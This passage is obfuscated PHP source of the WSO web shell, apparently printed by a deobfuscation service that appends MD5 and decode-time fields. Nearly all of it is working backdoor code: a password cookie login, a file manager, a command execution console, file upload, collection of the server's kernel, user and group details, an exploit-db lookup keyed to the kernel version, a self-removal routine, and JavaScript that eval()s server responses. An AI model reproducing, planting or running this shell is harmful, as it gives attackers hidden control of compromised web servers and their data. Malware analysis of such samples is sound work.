6\141\x6c\165\145\x3d\x70\x32\x3b\x65\x6c\x73\x65\x20\x64\56\x6d\146\x2e\160\x32\56\166\141\x6c\x75\x65\x3d\160\x32\x5f\73\xd\12\11\x9\x69\x66\x28\x70\63\x21\x3d\156\165\x6c\154\x29\144\56\155\x66\x2e\160\63\x2e\x76\141\x6c\x75\145\x3d\x70\63\x3b\x65\154\x73\x65\x20\144\56\x6d\146\x2e\160\63\x2e\166\141\x6c\x75\145\x3d\160\x33\x5f\x3b\15\xa\x9\x9\151\x66\50\143\150\141\x72\163\145\164\x21\x3d\x6e\165\x6c\154\51\x64\x2e\155\x66\x2e\x63\150\x61\162\163\145\164\56\166\141\x6c\x75\145\x3d\x63\x68\141\162\163\x65\164\x3b\145\154\163\145\x20\144\56\x6d\x66\x2e\x63\x68\141\162\x73\x65\x74\x2e\166\x61\154\165\145\x3d\x63\150\x61\162\163\145\164\x5f\73\xd\12\11\x7d\xd\xa\x9\x66\x75\156\x63\x74\x69\157\x6e\40\x67\50\141\54\143\x2c\160\61\x2c\x70\x32\54\160\63\x2c\x63\x68\x61\x72\x73\145\x74\x29\40\x7b\15\12\x9\11\163\x65\x74\50\x61\54\x63\x2c\160\61\x2c\160\x32\54\x70\63\x2c\143\x68\141\162\x73\x65\x74\x29\x3b\xd\xa\x9\11\x64\x2e\x6d\146\56\x73\x75\x62\x6d\x69\164\50\x29\73\xd\12\x9\175\xd\12\11\x66\x75\156\143\164\x69\157\x6e\40\x61\50\141\x2c\x63\54\x70\61\54\x70\x32\x2c\x70\x33\x2c\x63\150\x61\x72\x73\145\164\x29\x20\173\15\12\11\11\163\145\164\x28\x61\54\143\x2c\160\61\54\x70\62\x2c\x70\x33\x2c\143\150\x61\162\x73\x65\164\51\x3b\xd\xa\11\x9\166\x61\162\40\160\141\x72\141\x6d\163\x20\75\x20\x27\141\x6a\141\170\75\x74\x72\x75\x65\47\73\xd\xa\x9\x9\x66\157\x72\x28\151\75\60\73\151\x3c\x64\x2e\x6d\x66\x2e\x65\x6c\x65\155\x65\x6e\164\163\x2e\x6c\145\156\x67\164\150\73\x69\53\x2b\x29\15\xa\x9\11\x9\x70\x61\162\x61\155\x73\x20\53\75\40\47\46\x27\x2b\144\x2e\x6d\x66\56\x65\x6c\x65\155\145\x6e\x74\163\x5b\151\135\56\156\x61\x6d\x65\53\x27\75\x27\x2b\x65\x6e\x63\x6f\x64\145\x55\x52\x49\x43\157\155\160\x6f\156\145\156\x74\50\144\x2e\155\x66\x2e\x65\x6c\145\155\x65\156\164\163\133\x69\x5d\x2e\166\141\x6c\165\x65\51\73\xd\12\x9\x9\163\162\x28\x27" .
addslashes($_SERVER["\x52\x45\x51\125\105\123\x54\x5f\x55\x52\x49"]) .
"\47\x2c\40\160\x61\162\141\x6d\163\x29\73\15\xa\x9\x7d\xd\12\x9\x66\x75\x6e\x63\x74\151\x6f\x6e\40\163\x72\x28\x75\x72\154\x2c\40\160\141\x72\x61\x6d\x73\x29\x20\x7b\xd\12\11\x9\x69\x66\40\x28\x77\151\156\144\157\x77\x2e\130\115\x4c\x48\164\x74\160\x52\x65\161\x75\x65\x73\x74\x29\15\xa\11\x9\11\162\145\161\x20\x3d\x20\x6e\145\x77\40\130\x4d\114\x48\x74\x74\x70\122\145\161\165\145\163\x74\x28\x29\x3b\xd\12\x9\x9\x65\x6c\x73\145\x20\x69\x66\40\50\167\x69\156\144\x6f\167\56\101\x63\x74\x69\x76\145\130\117\142\152\x65\x63\x74\x29\xd\xa\x9\x9\11\x72\x65\161\40\x3d\x20\156\145\x77\40\x41\x63\164\x69\166\145\x58\x4f\142\152\x65\143\x74\50\47\115\x69\143\162\x6f\163\157\x66\x74\x2e\x58\x4d\114\110\x54\124\x50\x27\51\73\xd\12\40\x20\x20\x20\40\x20\40\x20\151\146\x20\x28\x72\x65\161\x29\40\173\xd\12\40\x20\40\x20\x20\40\x20\x20\x20\x20\x20\40\x72\x65\x71\x2e\x6f\x6e\x72\145\141\144\x79\x73\x74\x61\x74\145\x63\x68\x61\x6e\x67\x65\40\x3d\40\x70\162\157\x63\145\163\x73\122\145\x71\103\x68\141\156\x67\x65\73\xd\xa\x20\40\40\x20\x20\x20\x20\40\40\40\x20\40\x72\145\161\56\x6f\x70\145\x6e\50\47\x50\117\123\124\47\54\x20\x75\162\154\x2c\x20\164\162\x75\145\51\73\15\xa\40\40\x20\x20\x20\40\40\x20\40\x20\x20\40\162\145\x71\56\x73\145\164\122\145\x71\x75\145\x73\x74\x48\145\x61\x64\145\162\40\50\x27\103\157\x6e\164\x65\156\x74\55\x54\x79\160\145\47\54\40\47\x61\x70\x70\154\x69\143\x61\x74\x69\157\156\x2f\170\55\167\x77\x77\55\x66\157\x72\x6d\55\x75\162\x6c\145\x6e\143\x6f\x64\x65\144\47\x29\x3b\xd\xa\x20\40\40\40\x20\x20\40\x20\40\x20\40\x20\x72\145\x71\56\x73\x65\156\x64\x28\160\141\162\x61\x6d\163\x29\73\xd\12\40\40\40\40\x20\40\40\40\x7d\15\xa\11\175\15\xa\x9\146\x75\156\143\164\x69\157\156\x20\x70\x72\x6f\143\x65\x73\163\122\x65\161\103\x68\141\x6e\147\145\x28\51\x20\x7b\15\12\11\11\x69\146\x28\x20\50\x72\x65\x71\x2e\162\145\141\x64\x79\123\x74\141\164\x65\x20\75\x3d\40\64\51\40\51\15\xa\11\x9\x9\151\146\50\x72\145\x71\56\x73\164\141\x74\x75\x73\40\x3d\x3d\x20\62\x30\x30\x29\40\173\xd\12\11\11\x9\x9\x76\x61\162\x20\x72\x65\147\x20\75\40\156\x65\167\x20\122\145\x67\105\x78\x70\50\42\50\134\134\144\53\x29\50\x5b\x5c\x5c\x53\134\x5c\x73\x5d\52\51\x22\54\x20\47\155\x27\51\73\xd\12\11\11\11\11\166\141\x72\x20\x61\x72\162\75\162\145\147\56\145\170\145\x63\x28\162\145\161\x2e\162\x65\x73\x70\x6f\156\x73\x65\x54\x65\170\164\x29\73\xd\12\11\11\x9\11\145\166\141\x6c\x28\141\x72\162\133\62\135\56\163\x75\x62\x73\x74\162\x28\x30\x2c\40\x61\162\x72\133\61\135\51\51\x3b\xd\xa\x9\x9\x9\175\x20\145\154\x73\145\x20\141\154\x65\x72\x74\50\47\x52\145\x71\x75\x65\163\164\40\x65\162\162\157\x72\41\x27\x29\x3b\15\xa\x9\175\15\12\74\57\x73\x63\x72\151\160\x74\76\15\xa\74\150\145\141\144\x3e\x3c\142\x6f\x64\x79\x3e\x3c\144\x69\x76\x20\x73\164\171\154\145\75\47\160\x6f\x73\151\x74\x69\157\x6e\x3a\141\142\x73\x6f\x6c\x75\x74\x65\x3b\167\151\144\164\x68\72\61\60\x30\x25\73\142\141\x63\153\x67\162\x6f\165\156\x64\55\143\x6f\154\x6f\x72\72\x23\x34\x34\64\x3b\x74\157\160\72\x30\73\x6c\x65\x66\x74\x3a\x30\x3b\47\76\15\12\74\x66\157\162\155\40\x6d\145\164\150\x6f\x64\75\x70\x6f\x73\x74\x20\156\x61\x6d\x65\75\x6d\146\40\163\164\x79\154\145\x3d\47\x64\151\x73\160\154\x61\171\x3a\x6e\157\156\x65\73\x27\x3e\xd\12\74\151\156\160\x75\164\40\164\x79\160\x65\x3d\150\x69\x64\144\145\x6e\40\x6e\141\155\145\75\x61\76\xd\12\74\x69\156\x70\x75\x74\40\164\171\160\x65\x3d\x68\151\144\144\x65\x6e\x20\x6e\x61\155\145\x3d\143\x3e\xd\12\x3c\151\156\160\x75\164\x20\164\x79\x70\x65\x3d\x68\x69\144\144\145\156\40\156\141\x6d\x65\x3d\160\61\76\15\xa\x3c\x69\x6e\x70\x75\x74\40\164\x79\160\x65\75\150\151\x64\144\145\156\x20\x6e\x61\155\145\75\x70\x32\76\xd\12\x3c\x69\156\x70\165\x74\x20\x74\171\160\x65\75\x68\151\x64\x64\145\156\x20\x6e\141\155\145\75\160\x33\x3e\15\xa\74\151\156\160\x75\x74\40\164\171\160\x65\x3d\150\x69\x64\144\x65\156\40\156\141\155\145\75\x63\x68\141\162\x73\x65\x74\x3e\xd\12\74\57\x66\x6f\162\155\x3e";
goto yrJci;
HJ09z:
$totalSpace = @disk_total_space($GLOBALS["\143\167\144"]);
goto XR0lk;
mxXoN:
$explink =
"\150\x74\164\x70\72\57\57\145\x78\160\154\x6f\151\x74\55\144\142\56\143\157\x6d\57\x73\x65\141\162\143\x68\57\x3f\141\x63\x74\151\x6f\x6e\x3d\x73\x65\141\x72\143\150\46\x66\151\x6c\x74\145\162\x5f\144\x65\x73\x63\162\x69\160\x74\151\x6f\156\75";
goto CGFSE;
jqLRT:
$menu = "";
goto pyClH;
znu8e:
$kernel = @php_uname("\x73");
goto mxXoN;
IUSK1:
for ($i = 0; $i < $n - 1; $i++) {
$cwd_links .=
"\x3c\141\x20\150\x72\x65\x66\x3d\x27\43\x27\x20\157\x6e\x63\x6c\151\x63\x6b\75\x27\x67\x28\x22\x46\151\154\x65\163\x4d\141\x6e\x22\x2c\42";
for ($j = 0; $j <= $i; $j++) {
$cwd_links .= $path[$j] . "\57";
}
$cwd_links .= "\x22\51\47\76" . $path[$i] . "\57\74\57\x61\x3e";
}
goto yWMQp;
QAzn_:
$opt_charsets = "";
goto wJ6Eu;
hedz2:
$m["\x53\145\x6c\146\x20\x72\145\155\157\x76\x65"] =
"\x53\x65\154\146\122\145\x6d\x6f\x76\145";
goto jqLRT;
MFEdT:
$n = count($path);
goto IUSK1;
PbU2y:
$path = explode("\x2f", $GLOBALS["\143\167\x64"]);
goto MFEdT;
CGFSE:
if (strpos("\114\x69\x6e\165\170", $kernel) !== false) {
$explink .= urlencode(
"\x4c\151\x6e\165\x78\x20\113\x65\162\x6e\145\154\x20" .
substr($release, 0, 6)
);
} else {
$explink .= urlencode($kernel . "\40" . substr($release, 0, 3));
}
goto oXY47;
yrJci:
$freeSpace = @diskfreespace($GLOBALS["\143\167\144"]);
goto HJ09z;
pyClH:
foreach ($m as $k => $v) {
$menu .=
"\74\164\x68\x20\167\151\144\x74\150\x3d\42" .
(int) (100 / count($m)) .
"\x25\x22\76\x5b\40\x3c\x61\x20\x68\x72\x65\x66\x3d\42\x23\42\40\157\156\x63\154\x69\x63\153\75\42\x67\x28\47" .
$v .
"\47\x2c\x6e\165\x6c\x6c\x2c\47\47\x2c\47\x27\54\47\47\51\x22\76" .
$k .
"\74\x2f\x61\x3e\40\135\x3c\57\164\150\76";
}
goto QoI2U;
wJ6Eu:
foreach ($charsets as $item) {
$opt_charsets .=
"\x3c\157\160\164\151\157\156\40\166\141\x6c\165\145\75\42" .
$item .
"\42\x20" .
($_POST["\143\x68\141\x72\x73\x65\164"] == $item
? "\163\x65\x6c\x65\143\x74\145\144"
: "") .
"\x3e" .
$item .
"\74\x2f\157\x70\164\151\x6f\156\76";
}
goto M4wyI;
dJUUJ:
if ($GLOBALS["\157\163"] == "\x77\x69\x6e") {
foreach (range("\x63", "\x7a") as $drive) {
if (is_dir($drive . "\x3a\134")) {
$drives .=
"\74\x61\40\x68\162\x65\146\75\x22\43\x22\x20\157\x6e\143\154\151\x63\153\75\42\x67\x28\47\106\x69\x6c\145\163\115\141\x6e\x27\54\47" .
$drive .
"\x3a\57\x27\51\x22\76\x5b\x20" .
$drive .
"\x20\x5d\74\57\141\76\40";
}
}
}
goto FKql5;
wwJNm:
global $color;
goto nmRB7;
gDdS4:
$release = @php_uname("\x72");
goto znu8e;
oXY47:
if (
!function_exists("\160\157\x73\x69\170\137\147\x65\x74\x65\x67\151\x64")
) {
goto VMtJd;
VMtJd:
$user = @get_current_user();
goto RNehq;
RNehq:
$uid = @getmyuid();
goto kWs3Y;
n3X6Y:
$group = "\77";
goto dyMHz;
kWs3Y:
$gid = @getmygid();
goto n3X6Y;
dyMHz:
} else {
goto ec83q;
yJq0B:
$uid = $uid["\x75\x69\144"];
goto nZ1Iw;
nZ1Iw:
$group = $gid["\x6e\141\155\145"];
goto LgEQ1;
LgEQ1:
$gid = $gid["\x67\x69\x64"];
goto XEe3x;
q9aTZ:
$user = $uid["\156\141\x6d\x65"];
goto yJq0B;
ERGtZ:
$gid = @posix_getgrgid(posix_getegid());
goto q9aTZ;
ec83q:
$uid = @posix_getpwuid(posix_geteuid());
goto ERGtZ;
XEe3x:
}
goto HU3s7;
HU3s7:
$cwd_links = "";
goto PbU2y;
RzURU:
}
goto pXSrD;
lUvYe:
if (
!function_exists(
"\160\157\x73\x69\x78\137\147\145\164\147\162\x67\151\x64"
) &&
strpos(
$GLOBALS[
"\x64\x69\163\141\142\x6c\x65\137\146\x75\156\x63\x74\151\157\x6e\163"
],
"\x70\x6f\x73\x69\170\x5f\x67\x65\164\147\x72\147\151\x64"
) === false
) {
function posix_getgrgid($p)
{
return false;
}
}
goto d62j5;
V8rDW:
@set_time_limit(0);
goto hd5Oa;
KCE0z:
function wsoWhich($p)
{
goto qE7x8;
bvBsL:
if (!empty($path)) {
return $path;
}
goto A0ITv;
qE7x8:
$path = wsoEx("\167\150\151\x63\x68\x20" . $p);
goto bvBsL;
A0ITv:
return false;
goto xhdvj;
xhdvj:
}
goto HhMRL;
guAyk:
function wsoScandir($dir)
{
if (function_exists("\163\x63\141\x6e\x64\151\x72")) {
return scandir($dir);
} else {
goto AwLVq;
hfmSV:
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
goto Rc9At;
Rc9At:
return $files;
goto dO6EV;
AwLVq:
$dh = opendir($dir);
goto hfmSV;
dO6EV:
}
}
goto KCE0z;
pXSrD:
function wsoFooter()
{
$is_writable = is_writable($GLOBALS["\x63\167\144"])
? "\x20\74\146\157\156\164\x20\x63\157\154\157\162\x3d\x27\147\162\x65\145\156\47\76\50\x57\x72\151\x74\145\141\142\154\x65\x29\x3c\57\146\157\156\164\x3e"
: "\40\x3c\x66\x6f\156\x74\x20\143\157\154\157\162\x3d\x72\x65\x64\76\x28\116\157\164\x20\167\x72\151\164\x61\142\154\145\51\74\57\x66\x6f\156\x74\x3e";
echo "\xd\xa\74\57\144\151\166\x3e\xd\12\x3c\164\141\x62\x6c\145\x20\143\154\x61\163\163\75\x69\x6e\146\x6f\40\151\x64\x3d\164\157\x6f\154\x73\124\x62\154\x20\143\145\x6c\154\160\141\x64\x64\151\x6e\147\x3d\x33\40\x63\145\154\154\163\160\x61\143\x69\156\147\75\60\40\x77\x69\144\164\150\x3d\61\60\x30\45\x20\x20\163\164\171\x6c\145\x3d\47\142\157\x72\144\x65\162\x2d\164\157\160\72\x32\160\x78\x20\x73\157\154\151\x64\40\43\63\63\63\x3b\x62\157\x72\144\x65\x72\55\x62\x6f\x74\x74\157\155\72\62\160\170\x20\x73\157\x6c\x69\144\40\x23\63\x33\x33\x3b\47\76\xd\xa\x9\x3c\x74\x72\76\15\12\x9\x9\74\164\144\x3e\74\x66\x6f\162\155\40\157\x6e\163\x75\x62\155\151\x74\x3d\47\x67\50\156\x75\154\x6c\x2c\x74\x68\x69\x73\56\x63\x2e\166\141\x6c\x75\145\x2c\42\42\x29\73\162\x65\164\165\162\156\x20\146\x61\154\163\145\x3b\47\x3e\x3c\x73\160\141\x6e\x3e\103\150\141\156\x67\145\40\x64\151\x72\72\x3c\57\x73\160\141\x6e\76\x3c\x62\162\76\74\151\x6e\x70\x75\x74\x20\143\154\x61\x73\163\75\47\x74\157\x6f\x6c\x73\111\x6e\160\47\40\x74\x79\x70\x65\x3d\x74\x65\170\164\40\x6e\x61\155\x65\x3d\x63\x20\166\x61\x6c\165\x65\x3d\x27" .
htmlspecialchars($GLOBALS["\x63\167\144"]) .
"\x27\x3e\74\151\156\x70\x75\164\40\x74\171\160\x65\x3d\x73\165\x62\155\151\164\40\x76\141\x6c\x75\145\x3d\x27\76\x3e\x27\76\74\57\x66\157\x72\155\76\x3c\x2f\x74\144\76\15\xa\11\x9\x3c\164\x64\76\74\x66\x6f\x72\x6d\40\x6f\156\x73\x75\142\x6d\151\164\75\42\147\50\47\106\151\154\145\163\x54\x6f\157\x6c\x73\x27\x2c\x6e\x75\154\154\x2c\x74\x68\151\163\x2e\146\x2e\166\x61\x6c\165\145\51\x3b\162\145\x74\165\162\156\x20\146\x61\154\x73\x65\x3b\42\76\x3c\x73\x70\141\x6e\x3e\122\x65\141\x64\x20\146\151\154\145\x3a\x3c\57\163\x70\141\156\x3e\74\142\162\76\74\x69\x6e\x70\165\x74\40\x63\154\141\163\x73\75\x27\164\157\157\x6c\x73\x49\x6e\x70\47\x20\x74\x79\160\x65\75\164\x65\x78\x74\x20\156\141\x6d\x65\75\x66\76\74\x69\156\x70\165\x74\40\x74\171\160\145\x3d\x73\x75\x62\155\151\164\x20\166\141\x6c\165\x65\x3d\x27\x3e\x3e\x27\x3e\74\x2f\146\x6f\162\155\76\x3c\57\x74\x64\76\xd\12\11\x3c\x2f\x74\x72\x3e\x3c\164\x72\x3e\15\xa\x9\11\74\164\x64\76\x3c\x66\157\x72\x6d\40\x6f\156\x73\165\142\155\x69\164\x3d\42\147\x28\47\x46\x69\154\145\163\115\x61\x6e\47\54\156\x75\x6c\x6c\x2c\x27\x6d\153\x64\x69\x72\47\x2c\x74\x68\x69\x73\56\x64\x2e\x76\141\154\165\145\51\73\162\x65\x74\165\162\x6e\40\x66\x61\x6c\x73\x65\x3b\x22\x3e\74\x73\160\141\x6e\x3e\x4d\141\x6b\x65\40\x64\151\x72\72\x3c\x2f\163\x70\x61\156\x3e{$is_writable}\74\142\x72\x3e\74\x69\156\160\165\x74\40\143\x6c\141\163\x73\x3d\x27\x74\x6f\x6f\x6c\x73\x49\x6e\x70\x27\40\x74\171\x70\145\x3d\164\x65\170\164\x20\x6e\141\155\x65\75\x64\76\x3c\x69\x6e\160\x75\x74\40\164\x79\160\x65\x3d\163\x75\142\155\x69\x74\40\x76\x61\x6c\165\x65\x3d\x27\76\76\x27\76\74\57\146\x6f\162\155\76\x3c\57\164\x64\x3e\15\12\11\11\x3c\x74\144\x3e\74\x66\x6f\x72\155\x20\157\156\x73\165\142\x6d\151\164\75\x22\x67\50\x27\x46\151\x6c\145\163\x54\157\x6f\154\x73\47\x2c\156\x75\x6c\x6c\x2c\164\x68\151\x73\x2e\x66\x2e\166\x61\x6c\x75\145\54\47\x6d\153\146\151\x6c\145\47\x29\73\x72\x65\x74\x75\162\x6e\x20\x66\x61\x6c\163\145\73\x22\x3e\74\x73\x70\x61\x6e\x3e\115\x61\153\x65\40\x66\151\x6c\145\x3a\x3c\x2f\x73\160\x61\156\76{$is_writable}\74\142\162\x3e\74\x69\x6e\x70\165\164\x20\143\x6c\x61\163\x73\75\47\164\157\x6f\x6c\x73\111\156\x70\47\x20\164\171\160\145\75\x74\145\x78\x74\x20\156\x61\x6d\x65\75\146\76\74\151\156\x70\x75\164\x20\x74\171\x70\145\x3d\163\x75\142\x6d\x69\x74\x20\166\141\x6c\165\x65\x3d\x27\x3e\76\47\76\74\57\146\x6f\162\x6d\x3e\74\x2f\164\144\x3e\15\xa\x9\x3c\x2f\x74\x72\76\x3c\x74\x72\x3e\xd\xa\11\11\x3c\164\144\x3e\74\146\x6f\x72\x6d\x20\x6f\156\x73\x75\x62\x6d\x69\x74\75\42\x67\50\47\103\157\156\x73\157\154\145\x27\x2c\x6e\x75\x6c\x6c\54\164\150\x69\x73\x2e\143\x2e\166\141\154\165\145\x29\x3b\x72\145\x74\x75\162\156\x20\x66\141\x6c\x73\145\x3b\x22\76\74\x73\160\x61\x6e\x3e\105\170\145\x63\x75\x74\145\72\74\x2f\163\160\x61\156\x3e\x3c\x62\x72\x3e\74\151\156\160\x75\x74\x20\143\154\x61\x73\163\x3d\47\164\157\x6f\x6c\163\x49\156\160\x27\x20\164\171\160\145\75\164\x65\170\164\40\156\141\x6d\x65\x3d\143\40\166\141\x6c\x75\x65\75\47\x27\x3e\x3c\151\156\x70\x75\x74\x20\x74\171\x70\145\75\163\x75\x62\x6d\151\x74\40\166\x61\x6c\x75\x65\x3d\47\x3e\76\x27\76\74\57\146\x6f\162\x6d\x3e\74\x2f\164\144\x3e\15\xa\11\11\x3c\x74\144\x3e\74\x66\x6f\162\x6d\x20\155\145\164\x68\157\144\75\47\x70\x6f\163\164\47\40\x45\116\103\x54\x59\120\x45\x3d\x27\x6d\x75\x6c\x74\151\160\x61\x72\x74\57\x66\157\x72\155\x2d\144\141\164\141\x27\76\15\xa\x9\x9\x3c\151\156\160\165\x74\x20\164\x79\x70\x65\75\150\151\x64\x64\145\x6e\x20\x6e\x61\155\145\75\x61\40\166\x61\154\165\x65\x3d\x27\x46\x69\154\145\x73\115\101\156\x27\76\15\12\x9\11\74\151\x6e\160\x75\164\x20\x74\171\x70\x65\x3d\150\x69\144\x64\x65\156\40\x6e\141\x6d\145\75\143\x20\x76\141\x6c\x75\145\75\47" .
$GLOBALS["\x63\167\x64"] .
"\47\x3e\xd\12\x9\11\74\x69\156\160\165\x74\40\164\x79\x70\145\75\x68\x69\x64\144\x65\156\x20\156\141\x6d\x65\x3d\x70\61\40\166\141\x6c\165\145\75\47\165\160\x6c\157\x61\144\x46\151\154\145\47\76\xd\12\x9\x9\74\151\x6e\160\165\164\40\164\171\x70\145\75\150\151\144\x64\145\156\40\x6e\141\155\x65\75\143\150\x61\162\163\x65\x74\x20\166\141\154\x75\x65\75\47" .
(isset($_POST["\143\150\x61\x72\x73\145\164"])
? $_POST["\x63\150\x61\162\163\145\164"]
: "") .
"\47\x3e\15\12\x9\x9\x3c\163\x70\141\156\x3e\x55\x70\154\x6f\141\144\40\x66\x69\154\x65\72\74\57\163\x70\x61\x6e\76{$is_writable}\x3c\x62\162\76\74\151\x6e\160\165\x74\40\x63\154\141\163\163\x3d\x27\x74\x6f\x6f\154\x73\111\156\160\x27\x20\164\171\160\x65\75\146\x69\x6c\145\x20\x6e\141\155\145\x3d\146\x3e\74\x69\x6e\x70\x75\164\x20\x74\x79\160\x65\x3d\x73\165\142\x6d\151\164\40\166\141\x6c\165\145\75\47\x3e\76\47\x3e\74\x2f\x66\157\162\155\x3e\74\142\162\40\40\76\74\x2f\x74\x64\76\15\12\x9\74\x2f\x74\162\x3e\74\57\164\x61\x62\154\x65\76\x3c\57\x64\151\166\76\74\x2f\142\x6f\144\x79\x3e\74\x2f\x68\164\x6d\154\76";
}
goto XeOpc;
Qn_9k:
function wsoLogin()
{
die(
"\x3c\160\x72\145\x20\141\x6c\x69\x67\x6e\75\143\145\156\164\x65\x72\76\74\x66\x6f\162\155\x20\x6d\x65\x74\x68\x6f\144\x3d\x70\x6f\x73\x74\x3e\120\x61\x73\163\167\157\162\144\72\x20\74\x69\x6e\160\x75\x74\40\x74\171\160\145\75\160\141\x73\163\167\x6f\162\144\40\x6e\x61\155\145\75\160\x61\163\163\x3e\74\151\156\160\x75\164\x20\164\x79\160\x65\x3d\x73\x75\142\x6d\151\164\x20\166\141\x6c\x75\x65\75\x27\76\76\x27\x3e\x3c\57\x66\x6f\162\x6d\76\74\x2f\x70\162\145\76"
);
}
goto e2q7d;
i6mTz:
function actionSelfRemove()
{
goto KQZY3;
trHKc:
if ($_POST["\160\x31"] != "\171\145\163") {
wsoHeader();
}
goto X7soZ;
X7soZ:
echo "\74\150\x31\76\x53\x75\x69\143\151\144\145\74\x2f\150\x31\x3e\x3c\144\151\x76\x20\143\x6c\x61\x73\163\x3d\143\x6f\x6e\x74\x65\x6e\164\x3e\x52\x65\x61\x6c\x6c\171\40\x77\141\156\x74\x20\x74\x6f\40\x72\x65\x6d\x6f\166\x65\40\164\150\x65\x20\x73\x68\x65\x6c\x6c\x3f\x3c\142\162\76\74\x61\x20\x68\162\145\x66\x3d\x23\40\x6f\156\x63\x6c\151\143\153\75\42\147\x28\x6e\165\x6c\154\x2c\156\x75\x6c\x6c\54\x27\171\x65\x73\x27\x29\x22\76\x59\x65\x73\74\57\141\x3e\74\x2f\144\151\166\x3e";
goto tsvXj;
KQZY3:
if ($_POST["\x70\61"] == "\171\145\x73") {
if (
@unlink(
preg_replace(
"\x21\x5c\50\x5c\x64\53\x5c\x29\x5c\163\x2e\52\41",
"",
__FILE__
)
)
) {
die(
"\x53\x68\145\x6c\154\x20\x68\141\163\x20\142\x65\145\156\40\162\145\x6d\x6f\x76\x65\144"
);
} else {
echo "\165\x6e\x6c\151\x6e\153\x20\x65\162\162\157\162\x21";
}
}
goto trHKc;
tsvXj:
wsoFooter();
goto n3JxC;
n3JxC:
}
goto DbGtY;
TQr3j:
if (!empty($auth_pass)) {
if (
isset($_POST["\160\x61\x73\163"]) &&
md5($_POST["\x70\141\x73\163"]) == $auth_pass
) {
WSOsetcookie(
md5($_SERVER["\x48\124\x54\x50\x5f\110\x4f\123\124"]),
$auth_pass
);
}
if (
!isset(
$_COOKIE[md5($_SERVER["\x48\x54\x54\120\137\x48\x4f\123\x54"])]
) ||
$_COOKIE[md5($_SERVER["\x48\124\x54\120\x5f\x48\117\x53\124"])] !=
$auth_pass
) {
wsoLogin();
}
}
goto tZUOM;
e2q7d:
function WSOsetcookie($k, $v)
{
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
goto TQr3j;
yXkOt:
function wsoViewSize($s)
{
if ($s >= 1073741824) {
return sprintf("\45\x31\x2e\62\x66", $s / 1073741824) . "\40\107\x42";
} elseif ($s >= 1048576) {
return sprintf("\45\x31\x2e\x32\x66", $s / 1048576) . "\x20\115\102";
} elseif ($s >= 1024) {
return sprintf("\45\x31\x2e\62\146", $s / 1024) . "\40\113\x42";
} else {
return $s . "\x20\102";
}
}
goto etiAC;
Zxful:
exit();
Function Calls
None |
Stats
MD5 | 484aa5a3f678b270d37ef84caf761b41 |
Eval Count | 0 |
Decode Time | 275 ms |